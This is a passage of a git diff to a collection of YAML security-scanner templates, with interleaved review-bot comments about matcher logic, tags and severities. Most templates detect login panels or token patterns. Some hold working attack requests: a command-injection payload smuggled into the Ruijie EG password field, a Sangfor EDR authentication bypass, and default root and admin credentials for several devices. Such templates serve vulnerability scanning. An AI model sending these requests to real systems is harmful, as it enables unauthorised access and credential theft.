https://icr.advantech.cz/products/software/r-seenet + reference: https://icr.advantech.cz/products/software/r-seenet + tags: rseenet,default-login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: rseenet,default-login requests: - raw: - | diff --git a/poc/auth/ruijie-eg-password-leak-9922.yaml b/poc/auth/ruijie-eg-password-leak-9922.yaml deleted file mode 100644 index d2050ac470..0000000000 --- a/poc/auth/ruijie-eg-password-leak-9922.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: ruijie-eg-password-leak -info: - name: Ruijie EG Easy Gateway Password Leak - author: pikpikcu,pdteam - severity: high - description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability - reference: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - - https://www.ruijienetworks.com - tags: ruijie,exposure -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password=admin?show+webmaster+user - matchers-condition: and - matchers: - - type: word - words: - - '"data":' - - '"status":1' - - 'admin' - condition: and - part: body - - type: word - words: - - 'text/json' - part: header - - type: status - status: - - 200 - extractors: - - type: regex - group: 1 - regex: - - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/poc/auth/ruijie-eg-password-leak.yaml b/poc/auth/ruijie-eg-password-leak.yaml index 2cd5c661e3..d2050ac470 100644 --- a/poc/auth/ruijie-eg-password-leak.yaml +++ b/poc/auth/ruijie-eg-password-leak.yaml @@ -1,5 +1,4 @@ id: ruijie-eg-password-leak - info: name: Ruijie EG Easy Gateway Password Leak author: pikpikcu,pdteam @@ -9,7 +8,6 @@ info: - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - https://www.ruijienetworks.com tags: ruijie,exposure - requests: - raw: - | @@ -18,7 +16,6 @@ requests: Content-Type: application/x-www-form-urlencoded username=admin&password=admin?show+webmaster+user - matchers-condition: and matchers: - type: word 
@@ -28,18 +25,15 @@ requests: - 'admin' condition: and part: body - - type: word words: - 'text/json' part: header - - type: status status: - 200 - extractors: - type: regex group: 1 regex: - - 'admin ([a-zA-Z0-9#@]+)",' \ No newline at end of file + - 'admin ([a-zA-Z0-9#@]+)",' diff --git a/poc/auth/saferoads-vms-login-9971.yaml b/poc/auth/saferoads-vms-login-9971.yaml deleted file mode 100644 index 7fd9a2d174..0000000000 --- a/poc/auth/saferoads-vms-login-9971.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: saferoads-vms-login - -info: - name: Saferoads VMS Login - author: dhiyaneshDk - severity: info - tags: panel - reference: https://www.exploit-db.com/ghdb/6941 - -requests: - - method: GET - path: - - '{{BaseURL}}/login.html' - matchers: - - type: word - words: - - 'Saferoads VMS' \ No newline at end of file diff --git a/poc/auth/saferoads-vms-login-9973.yaml b/poc/auth/saferoads-vms-login-9973.yaml new file mode 100644 index 0000000000..d8ae82f7ad --- /dev/null +++ b/poc/auth/saferoads-vms-login-9973.yaml @@ -0,0 +1,16 @@ +id: saferoads-vms-login +info: + name: Saferoads VMS Login + author: dhiyaneshDk + severity: info + reference: + - https://www.exploit-db.com/ghdb/6941 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + matchers: + - type: word + words: + - 'Saferoads VMS' diff --git a/poc/auth/saferoads-vms-login.yaml b/poc/auth/saferoads-vms-login.yaml index d8ae82f7ad..e45673c12d 100644 --- a/poc/auth/saferoads-vms-login.yaml +++ b/poc/auth/saferoads-vms-login.yaml 
@@ -1,16 +1,28 @@ id: saferoads-vms-login + info: - name: Saferoads VMS Login + name: Saferoads VMS Login Panel - Detect author: dhiyaneshDk severity: info + description: Saferoads VMS login panel was detected. reference: - https://www.exploit-db.com/ghdb/6941 - tags: panel -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel,edb + +http: - method: GET path: - '{{BaseURL}}/login.html' + matchers: - type: word words: - 'Saferoads VMS' + +# digest: 4b0a00483046022100838bcb94cc1d2453c6ee0bf1b36cb8d64ef3bb04caa56bf123afdb615938472f022100b5609ff3b9052d9a9263a8c2abc1b4fee0f8827a076287a2a94f05987a626b87:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/samsung-wlan-default-login-10018.yaml b/poc/auth/samsung-wlan-default-login-10018.yaml new file mode 100644 index 0000000000..fcb7300e4c --- /dev/null +++ b/poc/auth/samsung-wlan-default-login-10018.yaml 
@@ -0,0 +1,45 @@ +id: samsung-wlan-default-login + +info: + name: Samsung Wlan AP (WEA453e) Default Login + author: pikpikcu + severity: high + description: Samsung Wlan AP (WEA453e) default root credentials were discovered. + reference: + - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + tags: samsung,default-login + +http: + - raw: + - | + POST /main.ehp HTTP/1.1 + Host: {{Hostname}} + + httpd;General;lang=en&login_id={{username}}&login_pw={{password}} + + payloads: + username: + - root + password: + - sweap12~ + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "document.formParent2.changepasswd1.value" + - "passwd_change.ehp" + + - type: status + status: + - 200 + +# digest: 490a0046304402204c0c004f4e1523701e478e97dea5095b387b9e48975efa867a71d9ec5012c9c802203dda76ffd89c7ddec72b0bf0621c90196db5ea0b214d890ef7dbd4c7fbbbc3e0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sangfor-edr-auth-bypass-10022.yaml b/poc/auth/sangfor-edr-auth-bypass-10022.yaml index 313272d6d7..19a68c8b9d 100644 --- a/poc/auth/sangfor-edr-auth-bypass-10022.yaml +++ b/poc/auth/sangfor-edr-auth-bypass-10022.yaml 
@@ -1,30 +1,45 @@ id: sangfor-edr-auth-bypass + info: - name: Sangfor EDR Authentication Bypass + name: Sangfor EDR - Authentication Bypass author: princechaddha severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. + description: | + Sangfor EDR contains an authentication bypass vulnerability. An attacker can access the system with admin privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cwe-id: CWE-287 + metadata: + max-request: 1 + fofa-query: app="sangfor" tags: sangfor,auth-bypass,login -requests: +http: - method: GET path: - "{{BaseURL}}/ui/login.php?user=admin" + matchers-condition: and matchers: - - type: status - status: - - 302 - type: word + part: body words: - "/download/edr_installer_" - part: body + - type: word + part: header words: - 'Set-Cookie=""' - part: header negative: true + - type: word + part: header words: - 'Set-Cookie=' - part: header + + - type: status + status: + - 302 + +# digest: 4a0a00473045022100b44fc80ed7fea92dcae3fa2c531204b2b0c157e3c31c62b264451a38c8aae83302206a40cc30c18dcbf7c19316b5798b7ccdf4953a2ddad03b78a16ed2ca37ecc91d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sangfor-edr-auth-bypass.yaml b/poc/auth/sangfor-edr-auth-bypass.yaml deleted file mode 100644 index 703d52dce3..0000000000 --- a/poc/auth/sangfor-edr-auth-bypass.yaml +++ /dev/null 
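Review bot: The last word matcher in poc/auth/sangfor-edr-auth-bypass-10022.yaml looks for the literal `Set-Cookie=` in `part: header`, but a response header is normally rendered as `Set-Cookie: name=value`. Unless the device emits a non-standard header, that string never occurs, and under `matchers-condition: and` the template cannot fire, giving a silent false negative. The negative matcher `Set-Cookie=""` has the same form and would be vacuously true. If the intent is "a non-empty session cookie was issued", `Set-Cookie:` as the positive word plus a negative regex for an empty value would express it. Confirm against a captured response from an affected build before changing it, and re-sign the template afterwards since it carries a `# digest:` line.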
@@ -1,29 +0,0 @@ -id: sangfor-edr-auth-bypass -info: - name: Sangfor EDR Authentication Bypass - author: princechaddha - severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. - tags: sangfor,auth-bypass,login -requests: - - method: GET - path: - - "{{BaseURL}}/ui/login.php?user=admin" - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - words: - - "/download/edr_installer_" - part: body - - type: word - words: - - 'Set-Cookie=""' - part: header - negative: true - - type: word - words: - - 'Set-Cookie=' - part: header diff --git a/poc/auth/sauter-login-10089.yaml b/poc/auth/sauter-login-10091.yaml similarity index 100% rename from poc/auth/sauter-login-10089.yaml rename to poc/auth/sauter-login-10091.yaml diff --git a/poc/auth/sauter-login.yaml b/poc/auth/sauter-login.yaml index 5a6965d3ce..052a5a3773 100644 --- a/poc/auth/sauter-login.yaml +++ b/poc/auth/sauter-login.yaml 
@@ -1,34 +1,20 @@ id: sauter-login - info: - name: Sauter moduWeb Login Panel - Detect + name: Sauter moduWeb - Login author: DhiyaneshDk severity: info - description: Sauter moduWeb login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6883 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,sauter,edb - -http: + reference: https://www.exploit-db.com/ghdb/6883 + tags: panel,sauter +requests: - method: GET path: - "{{BaseURL}}/?locale=en" - matchers-condition: and matchers: - type: word words: - Sauter moduWeb - Login part: body - - type: status status: - 200 - -# digest: 4a0a00473045022100a291bb674f27b7dc3071d42f57e98b34ab61994c2c902c4080cf61840d87e7c90220475ee58e61aa160ed91bb945d2f2eff4cd1d18a7120614e4692f872f2fda98b2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/seats-login-10104.yaml b/poc/auth/seats-login-10104.yaml deleted file mode 100644 index 735d33c6f9..0000000000 --- a/poc/auth/seats-login-10104.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: seats-login -info: - name: Seats login - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - "seats.io | login" - - type: status - status: - - 200 diff --git a/poc/auth/seats-login.yaml b/poc/auth/seats-login.yaml index 7844b8872d..735d33c6f9 100644 --- a/poc/auth/seats-login.yaml +++ b/poc/auth/seats-login.yaml @@ -3,8 +3,7 @@ info: name: Seats login author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 + reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 tags: panel requests: - method: GET 
diff --git a/poc/auth/seeddms-default-login-10125.yaml b/poc/auth/seeddms-default-login-10125.yaml index a0824cca35..695086cbe2 100644 --- a/poc/auth/seeddms-default-login-10125.yaml +++ b/poc/auth/seeddms-default-login-10125.yaml @@ -1,18 +1,10 @@ id: seeddms-default-login info: - name: SeedDMS Default Login + name: SeedDMS Default Credential author: alifathi-h1 severity: high - description: SeedDMS default admin credentials were discovered. - reference: - - https://www.seeddms.org/index.php?id=2 - - https://www.redhat.com/sysadmin/install-seeddms - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + reference: https://www.redhat.com/sysadmin/install-seeddms tags: default-login,seeddms requests: @@ -40,6 +32,4 @@ requests: - type: status status: - - 302 - -# Enhanced by mp on 2022/03/11 + - 302 \ No newline at end of file diff --git a/poc/auth/seeddms-default-login-10127.yaml b/poc/auth/seeddms-default-login-10127.yaml index 695086cbe2..ed3e30f3db 100644 --- a/poc/auth/seeddms-default-login-10127.yaml +++ b/poc/auth/seeddms-default-login-10127.yaml @@ -1,12 +1,17 @@ id: seeddms-default-login - info: - name: SeedDMS Default Credential + name: SeedDMS Default Login author: alifathi-h1 severity: high - reference: https://www.redhat.com/sysadmin/install-seeddms + description: SeedDMS default admin credentials were discovered. + reference: + - https://www.seeddms.org/index.php?id=2 + - https://www.redhat.com/sysadmin/install-seeddms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,seeddms - requests: - raw: - | @@ -15,13 +20,11 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 login={{username}}&pwd={{password}}&lang= - payloads: username: - admin password: - admin - attack: pitchfork matchers-condition: and matchers: 
@@ -29,7 +32,8 @@ requests: part: header words: - 'Location: /out/out.ViewFolder.php' - - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/sendgrid-api-key-10140.yaml b/poc/auth/sendgrid-api-key-10140.yaml index 88f920b11b..76506d7b27 100644 --- a/poc/auth/sendgrid-api-key-10140.yaml +++ b/poc/auth/sendgrid-api-key-10140.yaml @@ -3,7 +3,7 @@ info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,sendgrid requests: - method: GET path: diff --git a/poc/auth/sequoiadb-default-login-10150.yaml b/poc/auth/sequoiadb-default-login-10150.yaml index f7d7a2ef0b..39348896d3 100644 --- a/poc/auth/sequoiadb-default-login-10150.yaml +++ b/poc/auth/sequoiadb-default-login-10150.yaml @@ -1,19 +1,10 @@ id: sequoiadb-default-login - info: name: SequoiaDB Default Login author: dhiyaneshDk severity: high - description: SequoiaDB default admin credentials were discovered. + description: Searches for default admin credentials for the SequoiaDB application. tags: default-login,sequoiadb - reference: - - https://www.sequoiadb.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - requests: - raw: - | @@ -26,27 +17,21 @@ requests: SdbLanguage: en cmd=login&user={{username}}&passwd={{md5(password)}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: dsl dsl: - contains(tolower(all_headers), 'sdbsessionid') - - type: word part: body words: - '{ "errno": 0 }' - -# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/server-backup-login-10153.yaml b/poc/auth/server-backup-login-10153.yaml new file mode 100644 index 0000000000..0639ab5356 --- /dev/null +++ b/poc/auth/server-backup-login-10153.yaml 
@@ -0,0 +1,19 @@ +id: server-backup-login +info: + name: Server Backup Manager SE Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6949 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - 'Idera Server Backup Manager SE ' + - type: status + status: + - 200 diff --git a/poc/auth/server-backup-login-10156.yaml b/poc/auth/server-backup-login-10156.yaml deleted file mode 100644 index 4089d46390..0000000000 --- a/poc/auth/server-backup-login-10156.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: server-backup-login -info: - name: Server Backup Manager SE Login - author: dhiyaneshDKi,pathtaga - severity: info - reference: - - https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - matchers-condition: and - matchers: - - type: word - words: - - 'Idera Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/poc/auth/server-backup-login.yaml b/poc/auth/server-backup-login.yaml index 0639ab5356..91b0a05ace 100644 --- a/poc/auth/server-backup-login.yaml +++ b/poc/auth/server-backup-login.yaml 
@@ -1,19 +1,33 @@ id: server-backup-login + info: - name: Server Backup Manager SE Login - author: dhiyaneshDK + name: Server Backup Manager SE Login Panel - Detect + author: dhiyaneshDKi,pathtaga severity: info - reference: https://www.exploit-db.com/ghdb/6949 - tags: panel -requests: + description: Server Backup Manager SE login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: paneil,idera,edb + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - type: word words: - 'Idera Server Backup Manager SE ' + - type: status status: - 200 + +# digest: 4b0a0048304602210090abc9072a7291db264bd80b54c29efa2d20c83fa01a7010c87a84f97737417c02210089f946777a501eb1cb19bd09e3986cd67136b5806b261332c839db98947067cd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/server-backup-manager-se-login-detect.yaml b/poc/auth/server-backup-manager-se-login-detect.yaml index 94e05a332f..9e8e641acf 100644 --- a/poc/auth/server-backup-manager-se-login-detect.yaml +++ b/poc/auth/server-backup-manager-se-login-detect.yaml 
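Review bot: The added `tags: paneil,idera,edb` line in server-backup-login.yaml misspells `panel`, so a run filtered on the `panel` tag will not select this login-panel detection; it should read `tags: panel,idera,edb`. The added `author: dhiyaneshDKi,pathtaga` looks like the same stray-character slip, since the -10153 copy in this commit spells the first handle `dhiyaneshDK`. The hunk also appends a `# digest:` trailer, so correcting either field presumably means the template has to be re-signed before signature verification will accept it.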
@@ -1,20 +1,33 @@ id: server-backup-manager-se + info: - name: Server Backup Manager SE + name: Server Backup Manager SE Panel - Detect author: dhiyaneshDK severity: info + description: Server Backup Manager SE login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel -requests: + tags: panel,server,backup,manager + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - - type: word - words: - - 'Server Backup Manager SE ' + - type: regex + part: body + regex: + - ".*(Server Backup Manager SE).*" + - type: status status: - 200 + +# Enhanced by md on 2023/01/16 diff --git a/poc/auth/service-pwd.yaml b/poc/auth/service-pwd-10176.yaml similarity index 100% rename from poc/auth/service-pwd.yaml rename to poc/auth/service-pwd-10176.yaml diff --git a/poc/auth/service-pwd-10178.yaml b/poc/auth/service-pwd-10178.yaml index 6382f9de19..d9ee216153 100644 --- a/poc/auth/service-pwd-10178.yaml +++ b/poc/auth/service-pwd-10178.yaml 
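Review bot: The new matcher `".*(Server Backup Manager SE).*"` in server-backup-manager-se-login-detect.yaml is a plain substring test written as a regex; the leading and trailing `.*` and the capture group add work on every response body without making the match any more specific. A `- type: word` matcher with `part: body` and `words: - "Server Backup Manager SE"` expresses the same check more cheaply and is easier to read. The file ends with `# Enhanced by md on 2023/01/16` where the other rewritten templates in this commit carry a `# digest:` line, so this copy is presumably unsigned and may be skipped by runs that require signed templates.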
@@ -1,22 +1,30 @@ id: service-pwd + info: - name: Service password file + name: service.pwd - Sensitive Information Disclosure author: pussycat0x severity: high - description: Searches for sensitive service.pwd file. + description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service -requests: + metadata: + max-request: 1 + tags: exposure,listing,service,edb,misconfig + +http: - method: GET path: - "{{BaseURL}}/_vti_pvt/service.pwd" + matchers-condition: and matchers: - type: word words: - "# -FrontPage-" part: body + - type: status status: - 200 + +# digest: 490a00463044022032a929cfbf0c91c6e0fac77b275d5bf75705734a1cbd4ab0e274a740a3e2784502201502fc164696775ff97ad8cc4589ac3fe0375d4bb8bd508b9904f9ff55896707:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/servicedesk-login-panel-10172.yaml b/poc/auth/servicedesk-login-panel-10172.yaml deleted file mode 100644 index 230750434b..0000000000 --- a/poc/auth/servicedesk-login-panel-10172.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: servicedesk-login-panel -info: - name: Servicedesk Login Panel Detector - author: aashiq - severity: info - description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: servicedesk,confluence,jira,panel,login -requests: - - method: GET - path: - - "{{BaseURL}}/servicedesk/customer/user/login" - - "{{BaseURL}}/servicedesk/customer/portal/10/user/login" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "https://confluence.atlassian.com" diff --git a/poc/auth/servicedesk-login-panel.yaml b/poc/auth/servicedesk-login-panel.yaml index 5d949bca29..1b7c1dce37 100644 --- a/poc/auth/servicedesk-login-panel.yaml +++ b/poc/auth/servicedesk-login-panel.yaml 
@@ -1,13 +1,20 @@ id: servicedesk-login-panel info: - name: Servicedesk Login Panel Detector + name: Jira Service Desk Login Panel - Detect author: aashiq severity: info - description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint + description: Jira Service Desk login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 2 + shodan-query: http.component:"Atlassian Confluence" tags: servicedesk,confluence,jira,panel,login -requests: +http: - method: GET path: - "{{BaseURL}}/servicedesk/customer/user/login" @@ -22,3 +29,5 @@ requests: - type: word words: - "https://confluence.atlassian.com" + +# digest: 490a00463044022077309d33c3c113cdb8a92e187746ddff7b699f76668aa80262824496770b3adf022014618995cb77b35cbffe918e1bab542dbc73cebae78bdad610073ae5593c9b8e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sgp-login-panel-10182.yaml b/poc/auth/sgp-login-panel-10182.yaml index 8d70bb2b08..9ad3f1038a 100644 --- a/poc/auth/sgp-login-panel-10182.yaml +++ b/poc/auth/sgp-login-panel-10182.yaml @@ -3,8 +3,7 @@ info: name: SGP Panel author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22SGP%22 + reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22 tags: panel,sgp requests: - method: GET diff --git a/poc/auth/sgp-login-panel.yaml b/poc/auth/sgp-login-panel.yaml index 71d37d0284..8d70bb2b08 100644 --- a/poc/auth/sgp-login-panel.yaml +++ b/poc/auth/sgp-login-panel.yaml 
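Review bot: The added `shodan-query: http.component:"Atlassian Confluence"` in servicedesk-login-panel.yaml names a different product from the new title `Jira Service Desk Login Panel - Detect`, so anyone using the metadata to scope an asset inventory would be looking at the wrong population. The only content matcher visible in the second hunk is the word `https://confluence.atlassian.com`, a documentation link rather than a Service Desk marker, which presumably matches any Atlassian page on those paths that carries the link. I would add a comment above `matchers:` such as `# matches the Atlassian docs link, not a Service Desk-specific string` or tighten the word list; the rest of the matcher block lies outside the hunk.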
@@ -1,39 +1,26 @@ id: sgp-login-panel - info: - name: SGP Login Panel - Detect + name: SGP Panel author: dhiyaneshDK severity: info - description: SGP login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"SGP" + reference: + - https://www.shodan.io/search?query=http.title%3A%22SGP%22 tags: panel,sgp - -http: +requests: - method: GET path: - '{{BaseURL}}/accounts/login?next=/admin/' - matchers-condition: and matchers: - type: word words: - 'SGP' - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - ">Ver\\. ([0-9.A-Z]+)

" - -# digest: 4a0a0047304502203630d7e1217349d91aab73fb36c6102fe21d289d4a0ba7b32005342b8141d717022100dbfb88de5c9f9949f5b3f59918a2ccf9b85cf24946a0f6e2b47a62601eb5b6aa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sharecenter-login-10190.yaml b/poc/auth/sharecenter-login-10190.yaml index 929f60a7e4..ca2c625381 100644 --- a/poc/auth/sharecenter-login-10190.yaml +++ b/poc/auth/sharecenter-login-10190.yaml @@ -4,6 +4,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6892 + tags: panel,login requests: - method: GET path: diff --git a/poc/auth/shopify-custom-token(1).yaml b/poc/auth/shopify-custom-token(1).yaml new file mode 100644 index 0000000000..fbdd23d61d --- /dev/null +++ b/poc/auth/shopify-custom-token(1).yaml @@ -0,0 +1,16 @@ +id: shopify-custom-token + +info: + name: Shopify Custom App Access Token + author: gaurang + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shopify-custom-token-10198.yaml b/poc/auth/shopify-custom-token-10198.yaml deleted file mode 100644 index b4ef9d4c53..0000000000 --- a/poc/auth/shopify-custom-token-10198.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: shopify-custom-token -info: - name: Shopify Custom App Access Token - author: gaurang - severity: high - tags: token,file -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/shopify-custom-token-11860.yaml b/poc/auth/shopify-custom-token-11860.yaml index fbdd23d61d..b4ef9d4c53 100644 --- a/poc/auth/shopify-custom-token-11860.yaml +++ b/poc/auth/shopify-custom-token-11860.yaml 
@@ -1,16 +1,13 @@ id: shopify-custom-token - info: name: Shopify Custom App Access Token author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/shopify-private-token-11861.yaml b/poc/auth/shopify-private-token-11861.yaml deleted file mode 100644 index 7e308d71f9..0000000000 --- a/poc/auth/shopify-private-token-11861.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: shopify-private-token - -info: - name: Shopify Private App Access Token - author: gaurang - severity: high - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "shppa_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shopify-private-token.yaml b/poc/auth/shopify-private-token.yaml index bd7661b886..7e308d71f9 100644 --- a/poc/auth/shopify-private-token.yaml +++ b/poc/auth/shopify-private-token.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file + file: - extensions: - all @@ -12,6 +13,4 @@ file: extractors: - type: regex regex: - - "shppa_[a-fA-F0-9]{32}" - -# digest: 4a0a00473045022100a9be020541f7a37dd6e6656f9b67a9b0442ea70165319513ba08e1634e671f9402204d204366be0afb3f9811dcfefced9824ae43e1c1a4aec775fc11f0a6a97ecc86:922c64590222798bb761d5b6d8e72950 + - "shppa_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shoppable-token-10206.yaml b/poc/auth/shoppable-token-10206.yaml index 7f46fae563..12883090dd 100644 --- a/poc/auth/shoppable-token-10206.yaml +++ b/poc/auth/shoppable-token-10206.yaml @@ -1,14 +1,17 @@ id: shoppable-token + info: name: Shoppable Service Auth Token author: philippedelteil - severity: info + severity: unknown reference: https://ask.shoppable.com/knowledge/quick-start-api-guide tags: exposure,shoppable,token,auth,service + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word part: body 
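Review bot: The change from `severity: info` to `severity: unknown` in shoppable-token-10206.yaml leaves the finding without a rating and drops it from any run filtered by severity level, with nothing in the hunk explaining why. The same commit adds shoppable-token-10209.yaml with `severity: info` and shoppable-token.yaml with `severity: unknown`, all three under `id: shoppable-token`, so one exposure can be reported under one id with conflicting severities depending on which copies are loaded. I would keep `severity: info` in all three copies, or keep a single copy. The matcher block continues outside this hunk.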
diff --git a/poc/auth/shoppable-token-10209.yaml b/poc/auth/shoppable-token-10209.yaml new file mode 100644 index 0000000000..7f46fae563 --- /dev/null +++ b/poc/auth/shoppable-token-10209.yaml @@ -0,0 +1,16 @@ +id: shoppable-token +info: + name: Shoppable Service Auth Token + author: philippedelteil + severity: info + reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token,auth,service +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + words: + - data-shoppable-auth-token diff --git a/poc/auth/shoppable-token.yaml b/poc/auth/shoppable-token.yaml new file mode 100644 index 0000000000..71cd3fb638 --- /dev/null +++ b/poc/auth/shoppable-token.yaml @@ -0,0 +1,16 @@ +id: shoppable-token +info: + name: Shoppable Service Auth Token + author: philippedelteil + severity: unknown + reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token,auth,service +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + words: + - data-shoppable-auth-token diff --git a/poc/auth/showdoc-default-login-10221.yaml b/poc/auth/showdoc-default-login-10221.yaml index 4bf519de51..70a3336a98 100644 --- a/poc/auth/showdoc-default-login-10221.yaml +++ b/poc/auth/showdoc-default-login-10221.yaml @@ -1,4 